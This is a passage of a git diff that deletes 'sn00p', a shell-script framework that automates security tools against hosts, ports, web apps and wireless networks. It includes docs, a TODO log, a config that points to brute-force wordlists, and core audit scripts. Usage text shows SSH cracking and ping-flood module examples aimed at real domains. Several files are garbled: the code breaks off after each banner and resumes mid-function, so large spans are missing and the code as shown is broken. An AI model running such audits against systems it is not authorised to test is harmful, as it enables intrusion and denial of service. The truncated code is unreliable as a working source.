@@ -1,7 +0,0 @@ -sn00p is a modular tool written in bourne shell and designed to chain and -automate security tools and tests. It parses target definitions from the command -line and runs corresponding modules afterwards. sn00p can also parse a given nmap -logfile for open tcp and udp ports. All results will be logged in specified -directories and a report can subsequently be generated. - -this code is dedicated to my friend ZELJKO, who passed away (2nd Dec 2012). diff --git a/automation/sn00p/source/docs/README b/automation/sn00p/source/docs/README deleted file mode 100644 index 2bd10be..0000000 --- a/automation/sn00p/source/docs/README +++ /dev/null @@ -1 +0,0 @@ -please use: man sn00p/docs/sn00p.1 diff --git a/automation/sn00p/source/docs/TESTED b/automation/sn00p/source/docs/TESTED deleted file mode 100644 index fa26a08..0000000 --- a/automation/sn00p/source/docs/TESTED +++ /dev/null @@ -1,14 +0,0 @@ -===> 0.6 - * arch linux 3.13.5-1 - bash 4.2.45, gnu awk 4.1.0, gnu sed 4.2.2, - gnu grep 2.18 - * solaris - - * openindiana - - * fedora 17 (3.8.4) - bash 4.2.39, gnu awk 4.0.1, gnu sed 4.2.1, - gnu grep 2.14 - * opensuse 12.3 - bash 4.2.42, gnu awk 4.0.1, gnu sed 4.2.1, gnu grep 2.14 - * ubuntu 12.10 (3.5.0-27) - dash, mawk, gnu sed 4.2.1, gnu grep 2.12 - * mac os 10.8.3 - bash 3.2.48, awk 20070501, bsd sed, bsd grep 2.5.1 - * gentoo 3.8.8 - bash 4.2.45, gnu awk 4.0.2, gnu sed 4.2.2, gnu grep 2.14 - * netbsd 6.0.1 - ksh and bash, awk 20100523, bsd sed, gnu grep 2.5.1 - * freebsd 9.1 - ksh and bash, awk 20110810, bsd sed, gnu grep 2.5.1 - * openbsd 5.2 - ksh and bash, awk 20110810, bsd sed, grep 0.9 diff --git a/automation/sn00p/source/docs/THANKS b/automation/sn00p/source/docs/THANKS deleted file mode 100644 index 8973ba4..0000000 --- a/automation/sn00p/source/docs/THANKS +++ /dev/null @@ -1,4 +0,0 @@ -* my wife and my son supporting me during our hard life (SIRUM EM CES!) -* nullsecurity -* srm -* and to all my friends diff --git a/automation/sn00p/source/docs/TODO b/automation/sn00p/source/docs/TODO deleted file mode 100644 index c4e0822..0000000 --- a/automation/sn00p/source/docs/TODO +++ /dev/null @@ -1,84 +0,0 @@ -changelog and todo list for sn00p -================================= - -===> 0.X - * new option: saving and restoring sn00p session ........................ [] - * support 'all' value for '-i', '-I', '-x' and '-X' options ............. [] - * new option: audit services on non-default ports ....................... [] - * bugfix: 'include modules' procedure is wrong .......................... [] - * add new/more modules and audits ....................................... [] - -===> 0.8 - * re-run, re-test core and modules .................................. [DONE] - * new option: add text report style support ......................... [DONE] - * replace _print_error() with error(), warn() etc. .................. [DONE] - * man page: update and add '-c' option .............................. [DONE] - * new option: check for installed tools ............................. [DONE] - * bugfix: nmap relative path file check ............................. [DONE] - * status for 'how many targets left' ................................ [DONE] - * deleted trailing whitespaces ...................................... [DONE] - * output of tools '->' instead of '-->' ............................. [DONE] - -===> 0.7 - * 21.sh: deactivated ncftp anonymous login try ...................... [DONE] - * bugfix: added tcp and udp to modes in reports ..................... [DONE] - -===> 0.6 - * update manpage .................................................... [DONE] - * re-test sn00p core functionality .................................. [DONE] - * retest sn00p and clean up ......................................... [DONE] - * replace 'timeout' with own timeout function ................... [CANCELED] - * new options: single username and single password .................. [DONE] - * build wlan based default example module / audit ................... [DONE] - * build lan based default example module / audit .................... [DONE] - * added '-o' flag for mode options .................................. [DONE] - * fix: exclude modules .............................................. [DONE] - * new options: host, service, webapp and lan mode extra options ..... [DONE] - * re-written filter_port_list (replaced awk/sed with egrep) ......... [DONE] - * print how many audits left while auditing (e.g. 1/10) ............. [DONE] - * add option: timeout for modules ................................... [DONE] - * change sn00p version numbering .................................... [DONE] - * re-test sn00p on many OS .......................................... [DONE] - * replace README with manpage ....................................... [DONE] - * change description for sn00p ...................................... [DONE] - * build webapp based modules / audits ............................... [DONE] - * fix awk issues for solaris based systems .......................... [DONE] - * fix '-t' option to delete duplicated 'run_audits' call ............ [DONE] - * update host/default.sh ............................................ [DONE] - * added report style option to sn00p.conf ........................... [DONE] - * add option: support for command line target list .................. [DONE] - * refactor sn00p.sh code ............................................ [DONE] - * changed usage output .............................................. [DONE] - -===> 0.5 - * support nmap xml logfile format ................................... [DONE] - * support for -l host or -l tcp or -l udp ........................... [DONE] - * added IPsec/IKE module ............................................ [DONE] - -===> 0.4 - * generate html report .............................................. [DONE] - * added: create tcp/ and udp/ dir for ports ......................... [DONE] - * added: various netbios / rpc tests ................................ [DONE] - * added: tftp module ................................................ [DONE] - * added: dns cache snoop test ....................................... [DONE] - -===> 0.3 - * upgrade '-l' option (-l mod1,mod2 or -l all, etc.) ................ [DONE] - * exclude options (modules/tools) also in sn00p.conf ................ [DONE] - * option for 'include modules' ...................................... [DONE] - * option for 'include tools' ........................................ [DONE] - * build add_module option ........................................... [DONE] - * build make_module option .......................................... [DONE] - * upgrade README file ............................................... [DONE] - * comment the code .................................................. [DONE] - * change and adjust TODO file ....................................... [DONE] - -===> 0.2 - * replaced getopt with getopts ...................................... [DONE] - * option for excluding tools ........................................ [DONE] - * option for excluding modules ...................................... [DONE] - * renamed auditx to sn00p ........................................... [DONE] - * code redesign ..................................................... [DONE] - -===> 0.1 - * initial release ................................................... [DONE] diff --git a/automation/sn00p/source/docs/sn00p.1.gz b/automation/sn00p/source/docs/sn00p.1.gz deleted file mode 100644 index 483a884..0000000 Binary files a/automation/sn00p/source/docs/sn00p.1.gz and /dev/null differ diff --git a/automation/sn00p/source/sn00p.conf b/automation/sn00p/source/sn00p.conf deleted file mode 100644 index 1f23f5d..0000000 --- a/automation/sn00p/source/sn00p.conf +++ /dev/null @@ -1,38 +0,0 @@ -################################################################################ -# # -# sn00p config file # -# # -# NOTES: # -# - use ',' as seperator for multiple values # -# - command line options overwrite config options # -# # -################################################################################ - -# network interface -NETDEV="" - -# include modules, e.g. "host_foo,tcp_123,udp_122,web_foo,net_foo" -IN_MODULES="" - -# exclude modules, e.g. "host_foo,tcp_123,udp_122,web_foo,net_foo" -EX_MODULES="" - -# include tools, e.g. "foo,bar,baz" -IN_TOOLS="" - -# exclude tools, e.g. "foo,bar,baz" -EX_TOOLS="openssl_connect,http_nikto,https_nikto" - -# single username -USER="" - -# single password -PASS="" - -# username lists -USERLISTS="/home/noptrix/haxx/own/wordlist/user/default.txt" - -# password lists -PASSLISTS="/home/noptrix/haxx/own/wordlist/pass/default.txt" - -# EOF diff --git a/automation/sn00p/source/src/core/audit.sh b/automation/sn00p/source/src/core/audit.sh deleted file mode 100644 index 95e3fb3..0000000 --- a/automation/sn00p/source/src/core/audit.sh +++ /dev/null @@ -1,473 +0,0 @@ -#!/bin/sh -################################################################################ -# ____ _ __ # -# ___ __ __/ / /__ ___ ______ ______(_) /___ __ # -# / _ \/ // / / (_- ${tool}" - done - done - - return ${SUCCESS} -} - - -# list audits from host, tcp, udp, net or web -list_audit_dir() -{ - for i in `ls ${list}/*` - do - tools=`awk '/^do_[a-zA-Z0-9_()]/ {sub("do_",""); print}' ${i} | - sed 's/()//'` - - msg "\n[*] ${i}" - - for tool in ${tools} - do - echo " -> ${tool}" - done - done - - return ${SUCCESS} -} - - -# list audits from selected modules -list_audit_mod() -{ - list=`echo ${list} | tr ',' ' ' | tr '_' '/'` - - for i in ${list} - do - if [ -f "${i}.sh" ] - then - tools=`awk '/^do_[a-zA-Z0-9_()]/ {sub("do_",""); print}' \ - "${i}.sh" | sed 's/()//'` - - msg "\n[*] ${i}.sh" - - for tool in ${tools} - do - echo " -> ${tool}" - done - else - error "module ${i}.sh does not exist" - fi - done - - return ${SUCCESS} -} - - -# list available audits from modules -list_audits() -{ - cd "${SN00P_PATH}/src/modules" - - if [ "${list}" = "all" ] - then - list_audit_all - elif [ "${list}" = "host" -o "${list}" = "tcp" -o "${list}" = "udp" \ - -o "${list}" = "web" -o "${list}" = "lan" -o "${list}" = "wlan" ] - then - list_audit_dir - else - list_audit_mod - fi - - exit ${SUCCESS} - - return ${SUCCESS} -} - - -# run tcp or udp based audits -service_audits() -{ - # for status - i=${num_targets} - j=${cur_target} - - mkdir "${protocol}" > ${VERBOSE} 2>&1 - - # run audits for each port/service - for port in `cat ${portlist}` - do - dport="${port}" - - if [ ! -d ${port} ] - then - mkdir "${protocol}/${port}" > ${VERBOSE} 2>&1 - fi - - cd "${protocol}/${port}" - - # run default.sh module first - msg "[*] auditing ${host}:${port} [${protocol} default.sh]"\ - "(${j}/${i})" - ${_TIMEOUT} ${MOD_TIMEOUT} \ - sh "${SN00P_PATH}/src/modules/${protocol}/default.sh" \ - "${shost}" "${sport}" "${smac}" "${dhost}" "${dport}" "${dmac}" \ - "${rhost}" "${rport}" "${rmac}" "${ndev}" "${ssid}" "${bssid}" \ - "${url}" "${user}" "${pass}" "${ulists}" "${plists}" \ - "${cookie}" "${in_tools}" "${ex_tools}" "${VERBOSE}" - echo "" - - # now run specified modules - if [ -f "${SN00P_PATH}/src/modules/${protocol}/${port}.sh" ] - then - msg "[*] auditing ${host}:${port} [${protocol} ${port}.sh]"\ - "(${j}/${i})" - ${_TIMEOUT} ${MOD_TIMEOUT} \ - sh "${SN00P_PATH}/src/modules/${protocol}/${port}.sh" \ - "${shost}" "${sport}" "${smac}" "${dhost}" "${dport}" \ - "${dmac}" "${rhost}" "${rport}" "${rmac}" "${ndev}" "${ssid}" \ - "${bssid}" "${url}" "${user}" "${pass}" "${ulists}" \ - "${plists}" "${cookie}" "${in_tools}" "${ex_tools}" \ - "${VERBOSE}" - echo "" - fi - - # back to target dir - cd "../../" - done - - return ${SUCCESS} -} - - -# user included modules for host tests -user_audits() -{ - # for status - i=${num_targets} - j=${cur_target} - - for mod in ${in_mods} - do - if echo "${in_mods}" | grep "default" > ${VERBOSE} 2>&1 - then - # we do not need to run default.sh again - delete 'default' - in_mods=`echo ${in_mods} | sed 's/default//g'` - continue - fi - if [ -f "${SN00P_PATH}/src/modules/${atype}/${mod}.sh" ] - then - if [ ! -d "${mod}" ] - then - mkdir ${mod} - fi - - cd ${mod} - - msg "[*] auditing ${host} [${atype} ${mod}.sh] (${j}/${i})" - ${_TIMEOUT} ${MOD_TIMEOUT} \ - sh "${SN00P_PATH}/src/modules/${atype}/${mod}.sh" \ - "${shost}" "${sport}" "${smac}" "${dhost}" "${dport}" \ - "${dmac}" "${rhost}" "${rport}" "${rmac}" "${ndev}" "${ssid}" \ - "${bssid}" "${url}" "${user}" "${pass}" "${ulists}" \ - "${plists}" "${cookie}" "${in_tools}" "${ex_tools}" \ - "${VERBOSE}" - echo "" - - # back to ${atype}/ - cd "../" - else - warn "module ${mod} does not exist" - fi - done - - return ${SUCCESS} -} - - -# user did not include modules, so all available modules will be run -all_audits() -{ - # for status - i=${num_targets} - j=${cur_target} - - # run audit for each module - for mod in ${modules} - do - # exclude modules if chosen - if ! echo "${ex_mods}" | grep ${mod} > ${VERBOSE} 2>&1 - then - if [ ! -d "${mod}" ] - then - mkdir ${mod} - fi - - cd ${mod} - - if [ "${mod}" != "default" ] - then - msg "[*] auditing ${host} [${atype} ${mod}.sh] (${j}/${i})" - ${_TIMEOUT} ${MOD_TIMEOUT} \ - sh "${SN00P_PATH}/src/modules/${atype}/${mod}.sh" \ - "${shost}" "${sport}" "${smac}" "${dhost}" "${dport}" \ - "${dmac}" "${rhost}" "${rport}" "${rmac}" "${ndev}" \ - "${ssid}" "${bssid}" "${url}" "${user}" "${pass}" \ - "${ulists}" "${plists}" "${cookie}" "${in_tools}" \ - "${ex_tools}" "${VERBOSE}" - echo "" - fi - - # back to ${atype}/ - cd "../" - fi - done - - return ${SUCCESS} -} - - -# define to include and to exclude modules by given audit type -define_modules() -{ - if [ ${atype} = "host" ] - then - in_mods="${in_host_mods}" - ex_mods="${ex_host_mods}" - elif [ ${atype} = "web" ] - then - in_mods="${in_web_mods}" - ex_mods="${ex_web_mods}" - elif [ ${atype} = "lan" ] - then - in_mods="${in_lan_mods}" - ex_mods="${ex_lan_mods}" - elif [ ${atype} = "wlan" ] - then - in_mods="${in_wlan_mods}" - ex_mods="${ex_wlan_mods}" - else - return ${SUCCESS} - fi - - return ${SUCCESS} -} - - -# run default audits first and then user or all audits for given audit type -audit() -{ - # for status - i=${num_targets} - j=${cur_target} - - # audit type - atype="${1}" - - # read in all available modules for given audit type - modules="`ls ${SN00P_PATH}/src/modules/${atype} | sed 's/\.sh//g'`" - - if [ ! -d "${atype}" ] - then - mkdir ${atype} - fi - - if [ ! -d "${atype}/default" ] - then - mkdir "${atype}/default" - fi - - cd "${atype}/default" - - define_modules "${atype}" - - # run default.sh first - msg "[*] auditing ${target} [${atype} default.sh] (${j}/${i})" - ${_TIMEOUT} ${MOD_TIMEOUT} \ - sh "${SN00P_PATH}/src/modules/${atype}/default.sh" \ - "${shost}" "${sport}" "${smac}" "${dhost}" "${dport}" "${dmac}" \ - "${rhost}" "${rport}" "${rmac}" "${ndev}" "${ssid}" "${bssid}" \ - "${url}" "${user}" "${pass}" "${ulists}" "${plists}" "${cookie}" \ - "${in_tools}" "${ex_tools}" "${VERBOSE}" - echo "" - - # back to audit type directory - cd "../" - - if [ "${in_mods}" != "NONE" ] - then - # user chosed modules to include - user_audits - else - all_audits - fi - - # back to target directory - cd "../" - - return ${SUCCESS} -} - - -# run lan / wlan based audits -run_net_audits() -{ - # for stat line - num_targets="`echo ${urls} | tr -s ' ' '\n' | wc -l`" - cur_target=0 - - echo "" - - # grep network type from table list first - for netif in ${netifs} - do - net_type="`grep "${netif}" ${table_list} | cut -d ' ' -f 1`" - ndev="${netif}" - target="${ndev}" - cur_target=`expr ${cur_target} + 1` - - cd ${target} - - if [ ${net_type} = "lan" ] - then - audit "lan" - elif [ ${net_type} = "wlan" ] - then - audit "wlan" - else - return ${FAILURE} - fi - - # back to sn00p log dir - cd "../" - done - - return ${SUCCESS} -} - - -# get http or https port for webapp based audits -get_url_port() -{ - protocol="`echo ${url} | cut -d ':' -f 1`" - - if [ "${protocol}" = "http" ] - then - port="80" - elif [ "${protocol}" = "https" ] - then - port="443" - else - error "unknown web protocol" - fi - - return ${SUCCESS} -} - - -# run webapp based audits -run_web_audits() -{ - # for stat line - num_targets="`echo ${urls} | tr -s ' ' '\n' | wc -l`" - cur_target=0 - - echo "" - - # get all available web modules - modules=`ls ${SN00P_PATH}/src/modules/web/ | sed 's/\.sh//g'` - - # run audits for each $url - for url in ${urls} - do - target="${url}" - cur_target=`expr ${cur_target} + 1` - - # make url to host format and create host directory - host="`echo ${url} | cut -d '/' -f 3 | tr -d ';,?='`" - mkdir -p "${host}/web/default/" > ${VERBOSE} 2>&1 - cd ${host} - - # http or https? - get_url_port - - # run default.sh module first - audit "web" - - # back to sn00p log dir - cd "../" - done - - return ${SUCCESS} -} - - -# run host audits -run_host_audits() -{ - # for stat line - num_targets="`echo ${hosts} | tr -s ' ' '\n' | wc -l`" - cur_target=0 - - echo "" - - # run host, tcp and udp based audits - for host in ${hosts} - do - target="${host}" - dhost="${host}" - cur_target=`expr ${cur_target} + 1` - - # change to target dir and get service protocol if available - cd ${host} - protocol="`ls *_port.lst 2> ${VERBOSE} | cut -d '_' -f 1`" - - # host based audits - audit "host" - - # protocol / service based audits - if [ "${protocol}" ] - then - service_audits - fi - - # back to sn00p log dir - cd "../" - done - - return ${SUCCESS} -} - - -# EOF diff --git a/automation/sn00p/source/src/core/check.sh b/automation/sn00p/source/src/core/check.sh deleted file mode 100644 index 465c622..0000000 --- a/automation/sn00p/source/src/core/check.sh +++ /dev/null @@ -1,361 +0,0 @@ -#!/bin/sh -################################################################################ -# ____ _ __ # -# ___ __ __/ / /__ ___ ______ ______(_) /___ __ # -# / _ \/ // / / (_- /dev/null`" - done - - t=`echo ${t} | wc -w` - - if [ ${t} -eq 0 ] - then - echo " -> ${tool} not found" - fi - - t="" - done - - exit ${SUCCESS} - - return ${SUCCESS} -} - - -# check syntax for report styles -check_report_style() -{ - if [ ${report_style} != "html" -a ${report_style} != "txt" ] - then - error "wrong report style. choose 'html' or 'txt'" - fi - - return ${SUCCESS} -} - - -# check syntax for extra mode options -check_mode_opts() -{ - if [ "${mode_opts}" = '?' ] - then - print_mode_opts_syntax - fi - - return ${SUCCESS} -} - - -# check syntax for (w)lan mode options -check_lan_mode_opts() -{ - if [ "${net_list}" = '?' ] - then - print_lan_mode_syntax - fi - - return ${SUCCESS} -} - - -# check syntax for web mode options -check_web_mode_opts() -{ - if [ "${urls}" = '?' ] - then - print_web_mode_syntax - fi - - return ${SUCCESS} -} - - -# check syntax for host mode options -check_host_mode_opts() -{ - if [ "${target_list}" = '?' ] - then - print_host_mode_syntax - fi - - return ${SUCCESS} -} - - -# check target protocol (tcp, udp) -check_protocol() -{ - msg "[*] checking network protocol" > ${VERBOSE} 2>&1 - - if [ "${protocol}" != "tcp" -a "${protocol}" != "udp" ] - then - error "unknown protocol" - fi - - return ${SUCCESS} -} - - -# check for module directory prefix -check_mod_prefix() -{ - modprefix="host/ tcp/ udp/ web/ lan/ wlan/" - - msg "[*] checking module prefix" > ${VERBOSE} 2>&1 - - for mod in ${modprefix} - do - if echo "${2}" | grep "${mod}" > /dev/null - then - return ${SUCCESS} - fi - done - - # module prefix was wrong, exiting ... - error "wrong module prefix" - - return ${SUCCESS} -} - - -# check arguments for add_audit() -check_add_audit_args() -{ - if [ ${2} = '?' ] - then - print_add_audit_syntax - fi - - if [ ${#} -lt 3 ] - then - echo "[-] ERROR: wrong syntax" - exit ${FAILURE} - fi - - check_mod_prefix ${*} - - return ${SUCCESS} -} - - -# check arguments for make_module() -check_make_mod_args() -{ - if [ ${2} = '?' ] - then - print_create_mod_syntax - fi - - if [ ${#} -lt 3 ] - then - echo "[-] ERROR: wrong syntax" - exit ${FAILURE} - fi - - check_mod_prefix ${*} - - return ${SUCCESS} -} - - -# check if sn00p directory already exists -check_sn00p_dir() -{ - # new sn00p directory - sn00p_dir="sn00p-`date +%F`" - - msg "[*] checking sn00p directory" > ${VERBOSE} 2>&1 - - if [ -d ${sn00p_dir} ] - then - error "sn00p dir already exists" - fi - - return ${SUCCESS} -} - - -# check if file is a valid nmap grepable or xml logfile -check_logfile() -{ - msg "[*] checking for nmap logfile" > ${VERBOSE} 2>&1 - - if [ -f ${logfile} ] - then - nmap_valid=`head -1 ${logfile} | cut -d " " -f 1-2` - - if [ "${nmap_valid}" = "# Nmap" ] - then - nmap_grepable=`head -n 1 ${logfile} | grep "\-oG"` - - if [ -z "${nmap_grepable}" ] - then - error "${logfile} is not a grepable nmap logfile" - fi - elif [ "${nmap_valid}" = '' ] - then - usexml="1" - else - error "${logfile} not a nmap logfile" - fi - else - error "${logfile} is not a regular file!" - fi - - return ${SUCCESS} -} - - -# check for uid 0 (root) -check_uid() -{ - msg "[*] checking user id" > ${VERBOSE} 2>&1 - - if [ `whoami` != "root" ] - then - warn "you are not root" - fi - - return ${SUCCESS} -} - - -# check command line arguments selected by user -check_args() -{ - msg "[*] checking arguments" > ${VERBOSE} 2>&1 - - if [ -z "${logfile}" ] - then - if [ -z "${target_list}" ] - then - if [ -z "${urls}" ] - then - if [ -z "${net_list}" ] - then - error "WTF? mount /dev/brain" - fi - fi - fi - fi - - return ${SUCCESS} -} - - -# check argument count -check_argc() -{ - if [ ${#} -lt 2 ] - then - error "-H for help and usage" - fi - - return ${SUCCESS} -} - - -# checks sed version and sets '-E' or '-r' option for given OS -check_sed_version() -{ - msg "[*] checking sed version" > ${VERBOSE} 2>&1 - - sed -h 2> "sedtest.txt" - sedhead=`head -n 1 "sedtest.txt" | cut -d " " -f 2` - - if [ "${sedhead}" = "invalid" ] - then - # GNU sickness - _sed="sed -r" - else - _sed="sed -E" - fi - - rm -rf "${BEGIN_PATH}/sedtest.txt" > ${VERBOSE} 2>&1 - - return ${SUCCESS} -} - - -# set echo options for given OS -check_echo() -{ - if grep "Debian" "/proc/version" > ${VERBOSE} 2>&1 - then - ECHO_OPTS="" - elif grep "Ubuntu" "/proc/version" > ${VERBOSE} 2>&1 - then - ECHO_OPTS="" - elif [ `uname` = "SunOS" ] - then - ECHO_OPTS="" - elif [ `uname` = "Darwin" ] - then - ECHO_OPTS="" - else - ECHO_OPTS="-e" - fi - - return ${SUCCESS} -} - - -# check if timeout is installed. if not, unset $_TIMEOUT (see global.h). -check_timeout_cmd() -{ - cmd="`timeout --help 2> /dev/null | grep "^Usage"`" - - msg "[*] checking timeout command" > ${VERBOSE} 2>&1 - - if [ -z "${cmd}" ] - then - warn "timeout command not found. -T option will be ignored" - _TIMEOUT="" - MOD_TIMEOUT="" - fi - - return ${SUCCESS} -} - -# EOF diff --git a/automation/sn00p/source/src/core/getopt.sh b/automation/sn00p/source/src/core/getopt.sh deleted file mode 100644 index 36ac1d9..0000000 --- a/automation/sn00p/source/src/core/getopt.sh +++ /dev/null @@ -1,108 +0,0 @@ -#!/bin/sh -################################################################################ -# ____ _ __ # -# ___ __ __/ / /__ ___ ______ ______(_) /___ __ # -# / _ \/ // / / (_- ${VERBOSE} 2>&1 - - # delete nmap logfile - if [ -f "${BEGIN_PATH}/${sn00p_dir}/${logfile}" ] - then - rm -rf ${BEGIN_PATH}/${sn00p_dir}/${logfile} > ${VERBOSE} 2>&1 - fi - - # delete temp-port list files - rm -rf ${BEGIN_PATH}/${sn00p_dir}/tmp_* > ${VERBOSE} 2>&1 - - # delete port list files - rm -rf ${BEGIN_PATH}/${sn00p_dir}/*/*_port.lst > ${VERBOSE} 2>&1 - - # delete table.lst - rm -rf ${BEGIN_PATH}/${sn00p_dir}/table.lst > ${VERBOSE} 2>&1 - - return ${SUCCESS} -} - - -# print syntax of arguments for 'add audit' option -print_add_audit_syntax() -{ - echo "[*] syntax:" - echo " -> [cmd] [cmd_args]" - echo "[*] example:" - echo " -> tcp/22.sh crack_ssh sshcracker -c foo -f bar" - exit ${SUCCESS} - - return ${SUCCESS} -} - - -# print syntax of arguments for 'create module' option -print_create_mod_syntax() -{ - echo "[*] syntax:" - echo " -> [cmd] [cmd_args]" - echo "[*] example:" - echo " -> tcp/1337.sh ping_flood killahping -s 9999" - exit ${SUCCESS} - - return ${SUCCESS} -} - - -# print syntax and options for mode options -print_mode_opts_syntax() -{ - echo "[*] syntax:" - echo " -> '[=];...;[opt-N=,]'" - echo "[*] options:" - echo " -> shost - source host" - echo " -> sport - source port" - echo " -> smac - source macaddr" - echo " -> dhost - target host" - echo " -> dport - target port" - echo " -> dmac - target macaddr" - echo " -> rhost - router host" - echo " -> rport - router port" - echo " -> rmac - router macaddr" - echo " -> ndev - network interface" - echo " -> ssid - wifi ssid" - echo " -> bssid - wifi bssid" - echo " -> cookie - web cookie" - echo " -> user - single username" - echo " -> pass - single password" - echo " -> ulists - username lists" - echo " -> plists - password lists" - echo "[*] example:" - echo " -> 'rhost=192.168.0.1;sport=1337;ndev=em0," - echo " dmac=aa:bb:cc:dd:ee:ff;ssid=nullsex;ulists=/tmp/users.lst;" - echo " plists=/home/haxor/pass.lst,pass2.lst'" - - exit ${SUCCESS} - - return ${SUCCESS} -} - - -# print syntax of arguments for (w)lan mode -print_lan_mode_syntax() -{ - echo "[*] syntax:" - echo " -> '://;...'" - echo "[*] example:" - echo " -> 'lan://eth0;wlan://wlan0'" - - exit ${SUCCESS} - - return ${SUCCESS} -} - - -# print syntax of arguments for webapp mode -print_web_mode_syntax() -{ - echo "[*] syntax:" - echo " -> ',...,'" - echo "[*] example:" - echo " -> 'http://nullsecurity.net/,http://localhost'" - - exit ${SUCCESS} - - return ${SUCCESS} -} - - -# print syntax of arguments for host mode -print_host_mode_syntax() -{ - echo "[*] syntax:" - echo " -> '://:,...,;...'" - echo "[*] example:" - echo " -> 'udp://nullsecurity.net:514,161;tcp://google.com/'" - - exit ${SUCCESS} - - return ${SUCCESS} -} - - -# create sn00p dir and change the working dir -make_sn00p_dir() -{ - msg "[*] making sn00p dir" > ${VERBOSE} 2>&1 - - mkdir ${sn00p_dir} > ${VERBOSE} 2>&1 - - if [ ${logfile} ] - then - cp ${logfile} ${sn00p_dir} > ${VERBOSE} 2>&1 - logfile="`basename ${sn00p_dir}/${logfile}`" - fi - - cd ${sn00p_dir} - - return ${SUCCESS} -} - - -# very important, leet banner -banner() -{ - msg "--==[ sn00p by noptrix@nullsecurity.net ]==--" - - return ${SUCCESS} -} - - -# usage and help -usage() -{ - msg "usage:\n" - msg " sn00p.sh [options] | " - msg "\nmodes:\n" - msg " -s - target hosts and ports - ? to print syntax" - msg " -f - nmap xml or grepable logfile" - msg " -w - urls for webapp audits - ? to print syntax" - msg " -n - network type and devices for (w)lan audits" - msg " - ? to print syntax" - msg "\noptions:\n" - msg " -o - extra mode options - ? to print syntax" - msg " -i - include modules (default: all)" - msg " -I - include tools and tests (default: all)" - msg " -x - exclude modules (default: none)" - msg " -X - exclude tools or tests (default: none)" - msg " -T - timeout between each module (default: none)" - msg " -r - generate html or text report" - msg " -v - verbose mode (default: quiet)" - msg "\nmisc:\n" - msg " -c - check for missing tools (recommended)" - msg " -l - print all or specified audits and exit" - msg " -m - create a module - ? to print syntax" - msg " -t - add audit to existing module - ? to print syntax" - msg " -H - print this help" - msg " -V - print version number" - msg "\nexamples:\n" - msg " sn00p.sh -s 'udp://nullsecurity.net:514,161;tcp://google.com:80'" - msg " sn00p.sh -f /home/haxor/foo.nmap -w 'http://localhost' -r html" - msg " sn00p.sh -f nmap/foo.nmap -i tcp_1337 -I netcat,domain,amap -v" - msg " sn00p.sh -n 'lan://eth0' -o 'rhost=192.168.0.1;sport=1337'" - msg " sn00p.sh -l tcp_1337,host_zonetransfer,udp" - msg " sn00p.sh -m tcp/1337.sh ping_flood killahping -s 9999" - msg " sn00p.sh -t tcp/22.sh crack_ssh sshcracker -c arg -f arg" - - return ${SUCCESS} -} - - -# print line -msg() -{ - echo ${ECHO_OPTS} "${@}" - - return ${SUCCESS} -} - - -# print warning -warn() -{ - echo ${ECHO_OPTS} "[!] WARNING: ${@}" > /dev/stderr - - return ${SUCCESS} -} - - -# print error and exit -error() -{ - echo ${ECHO_OPTS} "[-] ERROR: ${@}" > /dev/stderr - exit ${FAILURE} - - return ${SUCCESS} -} - -# EOF diff --git a/automation/sn00p/source/src/core/module.sh b/automation/sn00p/source/src/core/module.sh deleted file mode 100644 index 2e0f2f6..0000000 --- a/automation/sn00p/source/src/core/module.sh +++ /dev/null @@ -1,205 +0,0 @@ -#!/bin/sh -################################################################################ -# ____ _ __ # -# ___ __ __/ / /__ ___ ______ ______(_) /___ __ # -# / _ \/ // / / (_- ${VERBOSE} 2>&1 - - if [ ! -f ${modfile} ] - then - error "${2} does not exist" - fi - - # delete "# go go go, run_audits and # EOF" lines - ${_sed} '/(\$)|(# go go go$)|(# EOF)/d' \ - "${SN00P_PATH}/src/modules/${2}" | sed '$d' > ${tmpfile} - - # add audit here - echo "# " >> ${tmpfile} - echo "do_${3}()" >> ${tmpfile} - echo "{" >> ${tmpfile} - echo " ${@} 2>&1" | echo " `cut -d " " -f 8-`" >> ${tmpfile} - echo "" >> ${tmpfile} - echo ' return ${SUCCESS}' >> ${tmpfile} - echo "}" >> ${tmpfile} - msg "\n\n# go go go\nrun_audits\n\n# EOF" >> ${tmpfile} - - # move and replace file with original - mv ${tmpfile} ${modfile} > ${VERBOSE} 2>&1 - - msg "[*] added audit ${3} to ${2}" - exit ${SUCCESS} - - return ${SUCCESS} -} - - -# create own modules from command line -make_module() -{ - modfile="${SN00P_PATH}/src/modules/${2}" - mod="`echo ${2} | cut -d '/' -f 1`" - num_lines="-119" - - msg "[*] creating module" > ${VERBOSE} 2>&1 - - if [ -f ${modfile} ] - then - error "${2} exists" - fi - - # copy first ${num_lines} lines from ${mod}/default.sh - head ${num_lines} "${SN00P_PATH}/src/modules/${mod}/default.sh" | - ${_sed} 's/DEFAULT/\/; - s/TCP|UDP|WEB|LAN|WLAN/\/' > ${modfile} - - # create module here - echo "# " >> ${modfile} - echo "do_${3}()" >> ${modfile} - echo "{" >> ${modfile} - echo " ${@} 2>&1" | echo " `cut -d " " -f 8-`" >> ${modfile} - echo "" >> ${modfile} - echo ' return ${SUCCESS}' >> ${modfile} - echo "}" >> ${modfile} - msg "\n\n# go go go\nrun_audits\n\n# EOF" >> ${modfile} - - msg "[*] created module ${2}" - - exit ${SUCCESS} - - return ${SUCCESS} -} - - -# exclude given modules -exclude_module() -{ - ex_host_mods=`echo ${ex_modules} | - awk '{for (i=1; i<=NF; i++) {split($i, a, /host_/); print a[2];}}'` - - ex_tcp_mods=`echo ${ex_modules} | - awk '{for (i=1; i<=NF; i++) {split($i, a, /tcp_[^0-9]*/); print a[2];}}'` - - ex_udp_mods=`echo ${ex_modules} | - awk '{for (i=1; i<=NF; i++) {split($i, a, /udp_[^0-9]*/); print a[2];}}'` - - ex_web_mods=`echo ${ex_modules} | - awk '{for (i=1; i<=NF; i++) {split($i, a, /web_/); print a[2];}}'` - - ex_lan_mods=`echo ${ex_modules} | - awk '{for (i=1; i<=NF; i++) {split($i, a, /lan_/); print a[2];}}'` - - ex_wlan_mods=`echo ${ex_modules} | - awk '{for (i=1; i<=NF; i++) {split($i, a, /wlan_/); print a[2];}}'` - - if [ -z "${ex_host_mods}" ] - then - ex_host_mods="NONE" - fi - if [ -z "${ex_tcp_mods}" ] - then - ex_tcp_mods="NONE" - fi - if [ -z "${ex_udp_mods}" ] - then - ex_udp_mods="NONE" - fi - if [ -z "${ex_web_mods}" ] - then - ex_web_mods="NONE" - fi - if [ -z "${ex_lan_mods}" ] - then - ex_lan_mods="NONE" - fi - if [ -z "${ex_wlan_mods}" ] - then - ex_wlan_mods="NONE" - fi - - return ${SUCCESS} -} - - -# include given modules -# keeping awk code simple (combine with tr), cause too much different -# versions...mawk, gawk, awk...FUCK! 